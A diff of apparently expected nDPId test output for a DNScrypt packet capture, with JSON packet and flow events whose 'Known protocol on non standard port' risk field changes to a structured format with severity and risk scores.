 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKekgAH4Rh58KAAABa6o5IteRAbsGBOOGsy4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":527,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":55185,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKekAuX4RrHIKAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":528,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKepAAH4Ra14KAAABa6o5Io3vAbsCCGeisy8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":529,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":36335,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00595{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 01136{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAIcKetAAH4Ra10KAAABa6o5IpGnAbsCCGeisy0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAG+AAwBugAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00683{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00792{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":530,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":37287,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKewgAH4Rh5wKAAABa6o5IoF3AbsGBDmjsywBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":531,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":33143,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 02419{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_packet_id":1,"flow_last_seen":946739396111,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAAXcKe0gAH4Rh5sKAAABa6o5IqSdAbsGBBZ5szABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAhkbnNjcnlwdAl2ZW50cmljbGUCdXMAABAAAQAAAAAAAAAAAAW6AAwFtgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="}
-00687{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5":"Known protocol on non standard port"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
+00796{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":532,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739396111,"flow_last_seen":946739396111,"flow_idle_time":180000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"ts_msec":946739396111,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"107.170.57.34","src_port":42141,"dst_port":443,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKewAuX4RrG8KAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
 00209{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":533,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60}
 00427{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":534,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"ts_msec":946739396111,"pkt":"REREREREZmZmZmZmCABFAABQKe0AuX4RrG4KAAABa6o5IgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="}
@@ -1109,24 +1109,24 @@
